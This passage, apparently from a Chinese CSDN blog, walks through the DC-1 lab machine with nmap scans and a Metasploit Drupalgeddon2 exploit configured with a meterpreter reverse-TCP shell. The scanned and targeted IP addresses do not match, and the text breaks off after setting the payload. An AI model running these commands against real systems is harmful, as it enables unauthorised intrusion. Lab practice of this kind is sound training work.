DC-1靶机渗透详细过程(附靶机连接)

本文详述了对DC-1靶机的渗透测试过程,包括IP扫描、漏洞利用、shell获取、数据库交互、权限提升等步骤,最终达到root权限并找到所有flag。
摘要由CSDN通过智能技术生成

查看本机的ip地址在这里插入图片描述

使用nmap进行ip地址扫描,确定靶机的IP
nmap -sP 192.168.159.1/24
在这里插入图片描述
对其进行详细扫描
nmap -A 192.168.159.140 -p 1-65535

在这里插入图片描述
80端口开放,直接使用浏览器访问
在这里插入图片描述
使用MSF搜索该网页模板存在的漏洞
msfconsole
search drupal
在这里插入图片描述
使用第四个攻击模块
use exploit/unix/webapp/drupal_drupalgeddon2

选择攻击载荷

set payload php/meterpreter/reverse_tcp

添加

set RHOSTS 192.168.1.158

set LHOST 192.168.1.150

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值